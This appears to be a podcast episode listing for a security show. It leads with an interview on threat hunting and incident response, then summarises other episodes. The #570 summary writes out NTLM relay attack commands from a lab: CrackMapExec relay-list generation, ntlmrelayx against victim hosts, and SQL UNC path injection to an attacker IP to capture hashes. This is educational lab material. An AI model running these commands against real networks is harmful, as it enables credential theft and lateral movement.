7MS #350: Interview with Lewie Wilkinson of Pondurance

7MS #350: Interview with Lewie Wilkinson of Pondurance

Today's featured interview is with Lewie Wilkinson, senior integration engineer at Pondurance. Pondurance helps customers improve their security posture by providing a managed threat hunting and response solution, including a 24/7 SOC. Lewie joined me via Skype to talk a lot about a topic I'm fascinated with: incident response! I had a slew of questions and topics I wanted to discuss, including:

  • Fundamentals of threat hunting

    • What is threat hunting?
    • What are the fundamentals to start mastering?
    • How can someone start developing the core skills to get good at it?
  • How can sysadmins/network admin, who have a busy enough time already just keeping the digital lights on, handle the mounting pressure to also shoulder security responsibilities as part of their job duties?

  • What training/cert options are good to build skills in threat hunting?

  • Lets say you know one of your users has clicked something icky and you suspect compromised machine/creds. You pull the machine off the network and rebuild it. How do you know that you've found/limited the extent of the damage?

  • Are attackers on networks typically wiping logs on systems as the bounce around laterally?

  • Anything to add to the low-hanging hacker fruit list?

  • Why is it so critical to not just have logs, but have verbose logs with rich data you need in an investigation?

  • When does it make sense to outsource some security responsibilities to a third party?

Learn more about Pondurance at their Web site and Twitter.

Episoder(696)

7MS #577: Tales of Pentest Pwnage - Part 48

7MS #577: Tales of Pentest Pwnage - Part 48

Holy schnikes - this episode is actually 7 minutes long! What a concept! Anyway, today I give you a couple tips that have helped me pwn some internal networks the last few weeks, including: Getting a second (and third?) opinion on Active Directory Certificate Services vulnerabilities! Analyzing the root domain object in BloodHound to find some misconfigs that might equal instant domain admin access!

16 Jun 20237min

7MS #575: Annoying Attackers with ADHD - Part 2

7MS #575: Annoying Attackers with ADHD - Part 2

Hey friends! Today we're taking a second look at ADHD - Active Defense Harbinger Distribution - a cool VM full of tools designed to annoy/attribute/attack pesky attackers! The tools covered today include: PHP-HTTP-TARPIT A tool to confuse and waste bot/scanner/hacker time. Grab it here and check out our setup instructions: sudo git clone https://github.com/msigley/PHP-HTTP-Tarpit.git /opt/tarpit cd /opt/tarpit sudo mv la_brea.php /var/www/html/index.php cd /var/www/html/ # Delete the default HTMLM files that are there sudo rm DEFAULT .HTML FILES # Start/restart apache2 sudo service apache2 stop sudo service apache2 start # It's easier to see PHP-HTTP-TARPIT in action from command line: curl -i http://IP.RUNNING.THE.TARPIT Spidertrap This tool tangles Web visitors in a never-ending maze of pages with links! sudo git clone https://github.com/adhdproject/spidertrap.git /opt/spidertrap cd /opt/spidertrap # Open spidertrap.py and change listening port from 8080 to 80 sudo nano spidertrap.py # Run the trap sudo python3 spidertrap.py Weblabyrinth This tool presents visitors with a blurb of text from Alice in Wonderland. That text has links that takes them to...you guessed it...more Alice in Wonderland excerpts! I especially like that if you visit ANY folder or link inside Weblabyrinth, content is served (return code 200 for anything and everything). I had problems getting this running on a fresh Kali box so it's probably better to run right off the ADHD distro using their instructions.

9 Jun 202333min

7MS #574: Annoying Attackers with ADHD

7MS #574: Annoying Attackers with ADHD

Hey friends! Today we're looking at ADHD - Active Defense Harbinger Distribution - a cool VM full of tools designed to annoy/attribute/attack pesky attackers! ADHD gets you up and running with these tools quickly, but the distro hasn't been updated in a while, so I switched to a vanilla Kali system and setup a cowrie SSH honeypot as follows (see 7ms.us for full list of commands).

2 Jun 202336min

7MS #573: Securing Your Mental Health - Part 4

7MS #573: Securing Your Mental Health - Part 4

Today we're talking about reducing anxiety by hacking your mental health with these tips: Using personal automation to text people important reminders Using Remind to create a personal communication "class" with your family members Using Smartsheet (not a sponsor) to create daily email "blasts" to yourself about all the various project todos you need to tackle

26 Mai 202336min

7MS #572: Protecting Your Domain Controllers with LDAP Firewall

7MS #572: Protecting Your Domain Controllers with LDAP Firewall

Today we look at LDAP Firewall - a cool (and free!) way to defend your domain controllers against SharpHound enumeration, LAPS password enumeration, and the noPac attack.

19 Mai 202326min

7MS #571: Simple Ways to Test Your SIEM - Part 2

7MS #571: Simple Ways to Test Your SIEM - Part 2

Hey friends! This week I spoke at the Secure360 conference in Minnesota on Simple Ways to Test Your SIEM. This is something I covered a while back on the podcast, but punched up the content a bit and built a refreshed a two-part GitHub gist that covers: Questions you can ask a prospective SIEM/SOC solution to figure out which one is the right fit for you All the tools/tips/scripts/etc. you need to run through 7 (and more!) simple ways to test your SIEM!

12 Mai 202331min

7MS #570: How to Build a Vulnerable Pentest Lab - Part 4

7MS #570: How to Build a Vulnerable Pentest Lab - Part 4

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! In today's episode we staged an NTLM relay attack using a vulnerable SQL server. First we used CrackMapExec (see our two part series on Cracking and Mapping and Execing with CrackMapExec - part 1 / part 2) to find hosts with SMB signing disabled: cme smb x.x.x.x/24 -u USER -p PASS --gen-relay-list smbsigning.txt Then we setup lsarelayx in one window: lsarelayx --host=localhost And in a second window we ran ntlmrelayx.py: python ntlmrelayx.py -smb2support --no-smb-server -t smb://VICTIM Finally, in a third window we triggered authentication from the vulnerable SQL server: Invoke-SQLUncPathInjection -verbose -captureip OUR.ATTACKING.IP.ADDRESS Boom! Watch the local usernames and hashes fall out of the victim system. We also tried doing a multirelay scenario where we had a list of victim hosts in a targets.txt file like this: victim1 victim2 victim3 Then we tweaked the ntlmrelayx command slightly: python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt Interestingly(?) only victim2 was attacked. Lastly, we ran the same attack but added the -socks option to establish SOCKS connections upon successful relay: python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt -socks Interestingly(?) we got a low-priv user to relay and setup a SOCKS connection, but not the domain admin configured on the SQL server. TLDR/TLDL: relaying credentials to a single victim with ntlmrelay on a Windows hosts seems to work great! Your milage may vary if you try to pull off more advanced tricks with ntlmrelay.

5 Mai 202332min

7MS #569: Interview with Jim Simpson of Blumira

7MS #569: Interview with Jim Simpson of Blumira

Today we're excited to share a featured interview with our new friend Jim Simpson, CEO of Blumira. Jim was in security before it was hip/cool/lucrative, working with a number of startups as well as some big names like Duo. Blumira and 7 Minute Security have a shared love for helping SMBs be more secure, so it was great to chat with Jim about the IT/security challenges faced by SMBs, and what we can do make security more simple and accessible for them.

28 Apr 202355min

Populært innen Politikk og nyheter

giver-og-gjengen-vg
aftenpodden
forklart
stopp-verden
aftenpodden-usa
popradet
fotballpodden-2
dine-penger-pengeradet
det-store-bildet
nokon-ma-ga
bt-dokumentar-2
frokostshowet-pa-p5
rss-dannet-uten-piano
aftenbla-bla
rss-ness
e24-podden
rss-penger-polser-og-politikk
rss-borsmorgen-okonominyhetene
rss-fredrik-og-zahid-loser-ingenting
rss-garne-damer